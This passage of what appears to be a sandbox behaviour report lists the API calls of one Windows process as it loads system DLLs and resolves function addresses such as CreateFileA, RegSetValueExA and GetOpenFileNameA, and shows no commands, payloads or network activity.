"value": "0x75860000" }, { "name": "FunctionName", "value": "DeleteCriticalSection" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7717fc70" } ], "repeated": 0, "id": 393 }, { "timestamp": "2025-03-02 21:32:32,748", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateThread" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758811b0" } ], "repeated": 0, "id": 394 }, { "timestamp": "2025-03-02 21:32:32,748", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateFileA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833a0" } ], "repeated": 0, "id": 395 }, { "timestamp": "2025-03-02 21:32:32,764", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateEventA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758831a0" } ], "repeated": 0, "id": 396 }, { "timestamp": "2025-03-02 21:32:32,764", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateDirectoryA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883370" } ], "repeated": 0, "id": 397 }, { "timestamp": "2025-03-02 21:32:32,764", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CopyFileA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75878b60" } ], "repeated": 0, "id": 398 }, { "timestamp": "2025-03-02 21:32:32,764", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CompareStringA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75877d40" } ], "repeated": 0, "id": 399 }, { "timestamp": "2025-03-02 21:32:32,764", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 400 }, { "timestamp": "2025-03-02 21:32:32,764", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "advapi32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" } ], "repeated": 0, "id": 401 }, { "timestamp": "2025-03-02 21:32:32,764", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegSetValueExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ed05d0" } ], "repeated": 0, "id": 402 }, { "timestamp": "2025-03-02 21:32:32,779", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegQueryValueExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecef60" } ], "repeated": 0, "id": 403 }, { "timestamp": "2025-03-02 21:32:32,779", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegOpenKeyExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf120" } ], "repeated": 0, "id": 404 }, { "timestamp": "2025-03-02 21:32:32,779", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegOpenKeyA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ed05f0" } ], "repeated": 0, "id": 405 }, { "timestamp": "2025-03-02 21:32:32,795", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegFlushKey" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ed0bb0" } ], "repeated": 0, "id": 406 }, { "timestamp": "2025-03-02 21:32:32,795", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegCloseKey" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf030" } ], "repeated": 0, "id": 407 }, { "timestamp": "2025-03-02 21:32:32,795", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 408 }, { "timestamp": "2025-03-02 21:32:32,795", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Sleep" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758811a0" } ], "repeated": 0, "id": 409 }, { "timestamp": "2025-03-02 21:32:32,810", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" } ], "repeated": 0, "id": 410 }, { "timestamp": "2025-03-02 21:32:32,810", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "SafeArrayPtrOfIndex" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76da57d0" } ], "repeated": 0, "id": 411 }, { "timestamp": "2025-03-02 21:32:32,810", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "SafeArrayGetUBound" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76da3d90" } ], "repeated": 0, "id": 412 }, { "timestamp": "2025-03-02 21:32:32,826", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "SafeArrayGetLBound" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76da5220" } ], "repeated": 0, "id": 413 }, { "timestamp": "2025-03-02 21:32:32,826", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "SafeArrayCreate" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76da88b0" } ], "repeated": 0, "id": 414 }, { "timestamp": "2025-03-02 21:32:32,826", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VariantChangeType" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dad7d0" } ], "repeated": 0, "id": 415 }, { "timestamp": "2025-03-02 21:32:32,826", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VariantCopy" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dacfc0" } ], "repeated": 0, "id": 416 }, { "timestamp": "2025-03-02 21:32:32,826", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VariantClear" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dae9e0" } ], "repeated": 0, "id": 417 }, { "timestamp": "2025-03-02 21:32:32,826", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VariantInit" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76da3d70" } ], "repeated": 0, "id": 418 }, { "timestamp": "2025-03-02 21:32:32,842", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x004e72ee" } ], "repeated": 0, "id": 419 }, { "timestamp": "2025-03-02 21:32:32,842", "thread_id": "7632", "caller": "0x004e7292", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.4355_none_c0dc01d438beab35\\comctl32" }, { "name": "DllBase", "value": "0x73910000" } ], "repeated": 0, "id": 420 }, { "timestamp": "2025-03-02 21:32:32,842", "thread_id": "7632", "caller": "0x004e7292", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "imm32.dll" }, { "name": "BaseAddress", "value": "0x75730000" } ], "repeated": 0, "id": 421 }, { "timestamp": "2025-03-02 21:32:32,842", "thread_id": "7632", "caller": "0x004e7292", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "comctl32.dll" }, { "name": "BaseAddress", "value": "0x73910000" } ], "repeated": 0, "id": 422 }, { "timestamp": "2025-03-02 21:32:32,842", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "_TrackMouseEvent" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73931fa0" } ], "repeated": 0, "id": 423 }, { "timestamp": "2025-03-02 21:32:32,857", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_SetIconSize" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x739717c0" } ], "repeated": 0, "id": 424 }, { "timestamp": "2025-03-02 21:32:32,857", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_GetIconSize" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73971760" } ], "repeated": 0, "id": 425 }, { "timestamp": "2025-03-02 21:32:32,857", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_Write" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73970f50" } ], "repeated": 0, "id": 426 }, { "timestamp": "2025-03-02 21:32:32,857", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_Read" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73970fc0" } ], "repeated": 0, "id": 427 }, { "timestamp": "2025-03-02 21:32:32,857", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_GetDragImage" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73970960" } ], "repeated": 0, "id": 428 }, { "timestamp": "2025-03-02 21:32:32,857", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_DragShowNolock" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73970b20" } ], "repeated": 0, "id": 429 }, { "timestamp": "2025-03-02 21:32:32,857", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_DragMove" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73970aa0" } ], "repeated": 0, "id": 430 }, { "timestamp": "2025-03-02 21:32:32,857", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_DragLeave" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73970ae0" } ], "repeated": 0, "id": 431 }, { "timestamp": "2025-03-02 21:32:32,873", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_DragEnter" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73970a60" } ], "repeated": 0, "id": 432 }, { "timestamp": "2025-03-02 21:32:32,873", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_EndDrag" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x739709a0" } ], "repeated": 0, "id": 433 }, { "timestamp": "2025-03-02 21:32:32,873", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_BeginDrag" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73970a00" } ], "repeated": 0, "id": 434 }, { "timestamp": "2025-03-02 21:32:32,873", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_Remove" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73971630" } ], "repeated": 0, "id": 435 }, { "timestamp": "2025-03-02 21:32:32,873", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_DrawEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73971450" } ], "repeated": 0, "id": 436 }, { "timestamp": "2025-03-02 21:32:32,873", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_Replace" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73971390" } ], "repeated": 0, "id": 437 }, { "timestamp": "2025-03-02 21:32:32,873", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_Draw" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73971510" } ], "repeated": 0, "id": 438 }, { "timestamp": "2025-03-02 21:32:32,889", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_GetBkColor" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x739712d0" } ], "repeated": 0, "id": 439 }, { "timestamp": "2025-03-02 21:32:32,889", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_SetBkColor" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73971270" } ], "repeated": 0, "id": 440 }, { "timestamp": "2025-03-02 21:32:32,889", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_Add" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x739711b0" } ], "repeated": 0, "id": 441 }, { "timestamp": "2025-03-02 21:32:32,904", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_GetImageCount" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x739710f0" } ], "repeated": 0, "id": 442 }, { "timestamp": "2025-03-02 21:32:32,904", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_Destroy" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73971090" } ], "repeated": 0, "id": 443 }, { "timestamp": "2025-03-02 21:32:32,904", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "ImageList_Create" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73970c70" } ], "repeated": 0, "id": 444 }, { "timestamp": "2025-03-02 21:32:32,904", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "InitCommonControls" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392e3d0" } ], "repeated": 0, "id": 445 }, { "timestamp": "2025-03-02 21:32:32,920", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "comdlg32.dll" }, { "name": "ModuleHandle", "value": "0x004e72ee" } ], "repeated": 0, "id": 446 }, { "timestamp": "2025-03-02 21:32:32,920", "thread_id": "7632", "caller": "0x004e7292", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\shcore" }, { "name": "DllBase", "value": "0x75bb0000" } ], "repeated": 0, "id": 447 }, { "timestamp": "2025-03-02 21:32:32,920", "thread_id": "7632", "caller": "0x004e7292", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\SHELL32" }, { "name": "DllBase", "value": "0x75c40000" } ], "repeated": 0, "id": 448 }, { "timestamp": "2025-03-02 21:32:32,920", "thread_id": "7632", "caller": "0x004e7292", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\comdlg32" }, { "name": "DllBase", "value": "0x755a0000" } ], "repeated": 0, "id": 449 }, { "timestamp": "2025-03-02 21:32:32,920", "thread_id": "7632", "caller": "0x004e7292", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "comdlg32.dll" }, { "name": "BaseAddress", "value": "0x755a0000" } ], "repeated": 0, "id": 450 }, { "timestamp": "2025-03-02 21:32:32,920", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comdlg32.dll" }, { "name": "ModuleHandle", "value": "0x755a0000" }, { "name": "FunctionName", "value": "GetSaveFileNameA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x755fce90" } ], "repeated": 0, "id": 451 }, { "timestamp": "2025-03-02 21:32:32,935", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comdlg32.dll" }, { "name": "ModuleHandle", "value": "0x755a0000" }, { "name": "FunctionName", "value": "GetOpenFileNameA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x755fcdb0" } ], "repeated": 0, "id": 452 }, { "timestamp": "2025-03-02 21:32:32,935", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "SHFolder.dll" }, { "name": "ModuleHandle", "value": "0x004e72ee" } ], "repeated": 0, "id": 453 }, { "timestamp": "2025-03-02 21:32:32,935", "thread_id": "7632", "caller": "0x004e7292", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\SHFolder" }, { "name": "DllBase", "value": "0x73900000" } ], "repeated": 0, "id": 454 }, { "timestamp": "2025-03-02 21:32:32,935", "thread_id": "7632", "caller": "0x004e7292", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "SHFolder.dll" }, { "name": "BaseAddress", "value": "0x73900000" } ], "repeated": 0, "id": 455 }, { "timestamp": "2025-03-02 21:32:32,935", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "SHFolder.dll" }, { "name": "ModuleHandle", "value": "0x73900000" }, { "name": "FunctionName", "value": "SHGetFolderPathA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73901370" } ], "repeated": 0, "id": 456 }, { "timestamp": "2025-03-02 21:32:32,935", "thread_id": "7632", "caller": "0x004e73a1", "parentcaller": "0x00000000", 